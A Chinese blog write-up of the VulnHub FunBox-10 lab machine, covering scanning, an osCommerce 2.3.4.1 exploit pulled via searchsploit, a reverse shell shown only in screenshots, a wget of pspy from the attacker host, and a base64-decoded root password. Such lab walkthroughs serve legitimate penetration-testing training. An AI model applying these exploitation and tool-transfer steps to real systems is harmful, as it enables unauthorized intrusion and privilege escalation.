vulnhub靶场之FunBox-10

最新推荐文章于 2024-11-07 13:30:57 发布
最新推荐文章于 2024-11-07 13:30:57 发布
阅读量1k 收藏 17
点赞数 21
分类专栏: [ vulnhub靶机通关篇 ] 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58091216/article/details/139380740
版权

一.环境搭建

1.靶场描述

As always, it's a very easy box for beginners.
This works better on VitualBox rather than VMware

2.靶场下载

Funbox: Under Construction! ~ VulnHub

image-20240601200957812

3.靶场启动

image-20240601201039869

靶场IP地址我们不知道,但是网段我们知道是192.168.2.0/24

二.信息收集

1.寻找靶场真实IP地址

nmap -sP 192.168.2.0/24

image-20240601201306195

arp-scan -l

image-20240601201341570

通过上面两个命令我们知道,靶场IP地址为192.168.2.12

2.探测端口及服务

nmap -p- -sV 192.168.2.12

image-20240601201555704

开启了22端口,服务为ssh
开启了25端口,服务为smtp
开启了80端口,服务为Apache httpd 2.4.18 ((Ubuntu))
开启了110端口,服务为pop3  
开启了143端口,服务为imap

三.渗透测试

1.访问web服务

http://192.168.2.12

image-20240601201945838

2.扫描web服务

1)nikto扫描

image-20240601202217331

扫描也没有

2)dirb扫描

image-20240601202758265

3)dirsearch扫描

image-20240601202820443

4)gobuster扫描

image-20240601202606520

通过上面的扫描,我们只扫描到一个路径/catalog,我们进行查看

3.渗透测试

1)访问/catalog

http://192.168.2.12/catalog/install/index.php

image-20240601202846664

我们可以看到osCommerce是一个电子商务系统,而且知道它的版本是2.3.4.1,我们进行搜索相关的漏洞

image-20240601203035139

2)搜索相关漏洞

searchsploit osCommerce 2.3.4.1

image-20240601203312680

我们可以看到一个python脚本,我们下载下来进行查看

3)下载python脚本

searchsploit  -m php/webapps/44374.py

image-20240601203458667

image-20240601203707296

4)反弹脚本

image-20240601204459715

image-20240601205001683

记得一定要访问这个页面,不然的话反弹不成功

http://192.168.2.12/catalog/install/includes/configure.php

image-20240601205022179

image-20240601205257017

我们可以看到权限比较低,我们进行提升权限

5)提权

find / -user root -perm -4000 -print 2>/dev/null 发现没有什么可以利用的

image-20240601210625310

我们利用pspy

黑客可以利用它来查看其他用户的计划任务工作 (cron job)等,该工具也非常适合技术人员在CTF(Capture The Flag)中枚举Linux系统。 pspy是一个 命令行工具 ,它可以在没有Root权限的情况下,监控Linux进程.

GitCode - 全球开发者的开源社区,开源代码托管平台

image-20240601210942360

我们进行下载,然后上传到靶机里面

python -m http.server 8080

wget http://192.168.2.9:8080/pspy64

image-20240601211705388

因为添加执行权限需要权限,我们切换到/tmp/目录下

image-20240601211922746

我们添加权限,执行脚本

image-20240601212056381

执行脚本,我们发现有个cron的定时任务

image-20240601215104464

脚本执行了很长时间

cat /usr/share/doc/examples/cron.sh
我们发现了一个加密的参数,是用base64加密的文件(以”==”结尾的多半是base64加密),我可以尝试解密,解码后发现是root的密码和账户,我们可以尝试登录

image-20240601215443427

image-20240601215637811

我们可以看到root密码是rfvbgt!!

image-20240601215816672

渗透测试结束

MS02423
关注
专栏目录
vulnhub靶机实战--FunBox:1
m0_64312309的博客
09-21 564
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
vulnhub靶机实战--FunBox2:ROOKIE
m0_64312309的博客
09-21 469
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
Vulnhub靶机:FunBox10
qq_48904485的博客
01-26 523
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:FunBox1010.0.2.35)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/funbox/Funbox10.ova/
2024年【软件测试】探索和学习SDLC与软件测试的关系,顺利通过阿里软件测试岗面试
2401_84563734的博客
05-08 516
Testing is part of every stage in modern SDLC models. (整合:在现代SDLC模型的每个阶段,测试都是一个组成部分。
【新手向】VulnHub靶场MONEYBOX:1 | 详细解析
YueXuan_521的博客
01-01 1891
【新手向】VulnHub靶场MONEYBOX:1 | 详细解析
靶机实战:Funbox10
CHAsichuan的博客
06-14 2243
一次中等难度的靶机超详细版记录
靶场通关教程 | SQL注入篇(一)
hackzkaq的博客
11-09 673
在之前的文章中牛牛给大家大致介绍了Yakit中的靶场Vulinbox安装教程(插入安装靶场文的链接),实验环境安装就位后,接下来就是上手实操。。网安圈中,你或许之前听过某某通过攻击数据库修改自己考试成绩的案例,(苏姐画坏牛牛修改成绩图)修改途径一般用的就是SQL注入方法。SQL注入漏洞作为网络安全最普遍的漏洞之一,在OWASP发布的top10排行榜中危害排名极高,数据库注入一直是web中一个令人头疼的问题。什么是SQL注入?
vulnhub靶场FunBox-8
qq_58091216的博客
05-26 995
我们查看根目录有/home,我们进行查看,可以看到4个用户名,我们再次进行ftp爆破。因为4个用户名,只有john没有爆破出来密码,所以我们进行ssh爆破。我们可以看到是一幅画,查看源代码发现,需要域名绑定。爆破出来用户名是johh,密码是zhnmju!我们首先把用户名放到一个文件里面,然后进行爆破。我们换一个思路进行渗透,我们想到前面的源代码。我们发现了密码,我们进行下载,我们进行爆破。我们想到开启了21端口,我们进行查看。我们可以看到2个文件,我们进行查看。我们查看jules用户名。
vulnhub靶场FunBox-3
qq_58091216的博客
05-05 321
我们不知道靶场的ip地址,但是我们知道靶场网段是192.168.2.0。我们可以看到登录成功,我们查看权限是tony,那么我们进行提权。我们上传一句话木马,可以看到上传成功,我们进行反弹shell。我们发现了一个用户名和一个md5加密的密码,我们进行解密。我们在/home/目录下发现了tony,我们进行查看。既然我们知道了ssh登录的密码,那么我们进行登录即可。我们可以看到扫描出来一个数据库,我们进行访问。我们发现了pkexec,我们进行提权。我们发现登录成功,我们寻找漏洞。我们可以看到ssh登录的密码。
vulnhub靶场FunBox-1
qq_58091216的博客
05-01 515
但是我们发现不能使用,那么我们就换一个思路,进行解决,我们知道22端口是开启的,我们使用ssh进行登录。虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.2.0/24。我们可以想到是IP地址和域名没有进行绑定,我们进行绑定即可。首先我们使用joe进行登录,但是没有发现有用的信息。我们可以发现一个404.php,我们进行利用即可。我们查看id,发现不是root权限,我们进行提权。爆破出来2个用户名和密码,我们进行登录查看。我们可以看到/home目录,我们进行查看。
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 700
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
vulnhub--Funbox: Under Construction!
venu_s的博客
08-04 474
靶机介绍 Description: As always, it’s a very easy box for beginners. Download:https://www.vulnhub.com/entry/funbox-under-construction,715/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描 nmap -sV -p- -A 192.168.187.177 目录扫描 gobuster dir -u http://19
Vulnhub:FUNBOX-EASYENUM靶机
logan_logan的博客
06-06 340
1.浏览器输入目标靶机IP地址浏览网页 2.端口扫描 nmap -p- 192.168.31.128 nmap -sC -sV -p 22,80 192.168.31.128 3.目录枚举 目录枚举的时候找到了一个有意思的mini.php目录 gobuster dir -u http://192.168.31.128 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html.txt 4.在浏览器打开min
Yak叫你来打靶了
YakProject的博客
11-02 556
整个学习过程中,有些人会倒在学习linux系统及命令的路上,还有人会倒在学习开发语言上......最后发现花了很大精力学完了基础内容,很多和网络安全关联不大,没有分清重点,浪费了很多时间。Yak团队坚持“做难而正确的事”,从打造网络安全底层基座出发,推出首个完全国产化网络安全底层能力融合的垂直开发语言Yaklang,让网安从业人员不再受限于代码编写能力;,其很大程度上学习的就是“黑客”技术,“没有矛的发展就没有盾的完善”,通过学习怎么。牛牛作为信安专业出身,曾经也想仗剑走天涯,成为牛逼的黑客。
防火墙|WAF|漏洞|网络安全
qq_43777616的博客
11-06 464
防火墙|WAF|漏洞|网络安全
信息安全建设方案,网络安全等保测评方案,等保技术解决方案,等保总体实施方案(Word原件)
最新发布
2301_79994950的博客
11-07 575
.1.2 安全通信网络测评 4.1.3 安全区域边界测评 4.1.4 安全计算环境测评 4.1.5 安全管理中心测评 4.1.6 安全管理制度测评 4.1.7 安全管理机构测评 4.1.8 安全管理人员测评
入门网络安全工程师要学习哪些内容(详细教程)
白帽子佳奇的博客
11-06 515
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
【知识科普】常见网络安全问题以及应对方式
wendao76的专栏
11-03 678
通过实现。
网络安全:数字时代的防护盾
勇敢的人先享受世界
11-06 516
网络安全(Cybersecurity)是指采取一系列措施来保护网络及其传输的数据免受未经授权的访问、篡改、攻击和损坏。机密性(Confidentiality):确保信息只能被授权的人或系统访问,防止数据泄露。完整性(Integrity):确保数据在传输和存储过程中不被篡改,保证数据的准确性和可靠性。可用性(Availability):确保数据和网络服务对合法用户的可用性,不受阻止或中断。网络安全不仅仅是防止黑客攻击,还包括防止各种类型的网络威胁、确保系统可靠性、实施安全政策和技术等多方面内容。
FUNBOX: UNDER CONSTRUCTION!
08-16
FUNBOX: UNDER CONSTRUCTION! 是一个面向初学者的基础级 BootToRoot 机器,难度较低。它有两个标志,可以在该链接下载:https://www.vulnhub.com/entry/funbox-under-construction,715/。通过主机发现工具netdiscover可以进行信息探测,命令如下:netdiscover -i eth0 -r 192.168.187.0/24。此外,在查看cron.sh文件时,可以进行base64解码,然后切换到root用户并获得flag。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [vulnhub刷题记录(FUNBOX: UNDER CONSTRUCTION!)](https://blog.csdn.net/admin_gt/article/details/126722192)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [vulnhub--Funbox: Under Construction!](https://blog.csdn.net/qq_39991837/article/details/119374087)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

MS02423

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值